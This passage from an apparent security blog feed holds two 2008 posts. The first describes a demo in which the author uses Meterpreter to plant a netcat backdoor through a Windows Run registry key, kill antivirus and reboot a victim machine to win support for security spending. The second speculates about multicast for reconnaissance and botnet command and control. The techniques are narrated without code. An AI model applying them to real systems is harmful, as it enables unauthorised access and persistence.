"HKLM\Software\Microsoft\Windows\CurrentVersion\Run" registry key to start my backdoor netcat listener on port 8888.</li></ul>While still using Meterpreter, I killed a few processes (like Symantec AV), executed notepad, calculator, solitaire to truly show the level of control I had over the victim.<br /><br />I then simply booted the machine from Meterpreter. After the reboot, I showed how I could use netcat from the MacBook to reconnect to the target multiple times, gaining Windows shell access each time.<br /><br />All of this was accomplished in 45 minutes and let me tell you, I scared the wits out of everyone in the room. The weirdest part for me was that <span style="font-weight: bold; font-style: italic;">remotely rebooting the victim machine from Meterpreter seemed to have the highest impact.</span> (<span style="font-style: italic;">*sigh*</span> - sometimes you just have to take what you can get....)<br /><br />However, the bottom line was outrageous success. In one short session, we built demand for more institutional network security implementation than we ever had experienced before. It actually turned into a case of "be careful what you wish for".Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-77865770088893648862008-10-24T02:40:00.000-07:002008-10-24T04:22:10.319-07:00Multicast as a recon. or attack vector?Having been in the network architecture and security business for some time, I am quite surprised that more network recon. and attack tools have not given consideration to Multicast destinations. The backdrop is that more and more internal networks are video [multicast] enabled, academic Internet2 participants are often Multicast enabled in a Wide Area (WAN) sense.<br /><br />Assuming minimally some internal network access, it would seem that a quick method of recon. would be to send traffic to a well known multicast app. address / port, and see what yields. At worst, you find a network that is not Multicast enabled and responses at layer 2 only.<br /><br />More insideous would be the existance of backdoor command and control of botnets listening on Multicast addresses. One would only need access to a single internal network node in a large enterprise to send command and control to the remainder of the herd. Or worse still, if that botnet lived within the Internet2 wide area Multicast space, the command and control aspect could easily be just a trickle of Multicast and not noticed.Unknownnoreply@blogger.com2